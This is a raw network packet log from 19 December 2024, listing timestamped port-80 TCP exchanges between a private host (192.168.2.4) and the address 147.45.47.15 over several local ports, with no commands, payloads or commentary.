Dec 19, 2024 08:52:39.195509911 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.195523024 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.195549965 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.195574999 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.196361065 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.196373940 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.196384907 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.196398020 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.196427107 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.196578979 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.197176933 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.197191000 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.197202921 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.197217941 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.197242022 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.197279930 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.198085070 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.198098898 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.198112011 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.198122978 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.198157072 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.198168993 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.199045897 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.199059010 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.199069977 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.199100971 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.199115992 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.199119091 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.200125933 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.200139046 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.200150967 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.200164080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.200175047 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.200215101 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.200701952 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.200714111 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.200725079 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.200738907 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.200763941 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.200774908 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.201582909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.201594114 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.201606035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.201617956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.201634884 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.201654911 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.202569008 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.202580929 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.202593088 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.202605963 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.202616930 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.202646971 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.203583002 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.203597069 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.203613997 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.203627110 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.203639030 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.203649998 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.203669071 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.204476118 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.204489946 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.204502106 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.204514027 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.204524994 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.204593897 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.205477953 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.205491066 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.205501080 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.205513000 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.205527067 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.205538034 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.205538034 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.205578089 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.206453085 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.206515074 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.206526995 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.206537962 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.206581116 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.206670046 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.207360983 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.207374096 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.207386971 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.207397938 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.207412004 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.207461119 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.207463026 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.207528114 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.208439112 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.208452940 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.208463907 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.208476067 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.208504915 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.209319115 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.209331989 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.209342957 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.209355116 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.209357977 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.209367037 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.209379911 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.209415913 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.210231066 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.210273027 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.210285902 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.210298061 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.210319996 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.210339069 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.211479902 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.211492062 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.211503983 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.211515903 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.211541891 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.211560011 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.212285995 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.212300062 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.212310076 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.212322950 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.212335110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.212347984 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.212347984 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.213174105 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.213187933 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.213201046 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.213213921 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.213241100 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.213248968 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.213270903 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.214158058 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.214170933 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.214181900 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.214195967 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.214207888 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.214219093 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.214253902 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.215105057 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.215117931 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.215131044 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.215142965 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.215154886 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.215167046 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.216069937 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.216083050 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.216094017 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.216106892 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.216120005 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.216126919 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.216145992 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.216191053 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.217019081 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.217032909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.217067957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.217081070 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.217106104 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.218007088 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.218019962 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.218030930 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.218043089 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.218055010 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.218065977 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.218075037 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.218106031 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.218985081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.218997955 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.219008923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.219022036 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.219047070 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.219067097 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.219897032 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.219913960 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.219924927 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.219937086 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.219947100 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.219980955 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.220921993 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.220932961 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.220942974 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.220959902 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.220971107 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.220979929 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.220999956 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.221882105 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.221899033 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.221911907 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.221919060 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.221941948 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.221966028 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.222249985 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.222839117 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.222851992 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.222862959 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.222875118 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.222886086 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.222906113 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.222929955 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.223818064 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.223830938 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.223839998 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.223850965 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.223860025 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.223869085 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.223891020 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.224745989 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.224765062 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.224776983 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.224787951 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.224790096 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.224824905 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.225718975 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.225737095 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.225749016 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.225760937 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.225774050 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.225781918 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.225807905 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.225883961 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.226665020 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.226718903 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.226732016 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.226742029 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.226783037 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.226804018 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.227669001 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.227682114 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.227705002 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.227718115 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.227725983 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.227771997 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.228653908 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.228666067 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.228677034 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.228688002 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.228708982 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.228727102 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.228737116 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.229618073 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.229638100 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.229650974 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.229661942 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.229670048 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.229691982 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.230598927 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.230612040 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.230623007 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.230638027 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.230648041 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.230654955 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.230705023 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.230756998 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.231574059 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.231587887 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.231601000 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.231611967 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.231637001 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.231673002 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.232518911 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.232532024 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.232542992 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.232554913 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.232578993 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.232605934 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.233480930 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.233494043 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.233503103 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.233515978 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.233527899 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.233537912 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.233583927 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.234431982 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.234442949 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.234482050 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.234492064 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.234494925 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.234543085 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.235436916 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.235449076 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.235459089 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.235471964 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.235503912 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.235517025 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.235523939 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.236351013 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.236362934 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.236382961 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.236398935 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.236404896 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.236423016 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.237344980 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.237355947 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.237374067 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.237387896 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.237395048 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.237406015 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.237417936 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.237442970 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.238385916 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.238399029 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.238409996 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.238456011 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.238584995 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.238619089 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.239268064 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.239281893 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.239290953 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.239336967 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.240442991 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.281543016 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.302129984 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.347457886 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.350879908 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.351025105 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.351075888 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.351367950 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.351605892 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.351665020 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.351680040 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.352695942 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.352741003 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.352822065 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.353785038 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.353954077 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.353997946 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.354172945 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.354506969 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.355149984 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.355282068 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.355385065 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.356168032 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.356290102 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.356434107 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.357311010 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.357419014 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.357472897 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.358406067 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.358537912 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.358589888 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.359549046 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.359728098 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.360205889 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.360666990 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.360768080 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.360857010 CET	49734	80	192.168.2.4	147.45.47.15
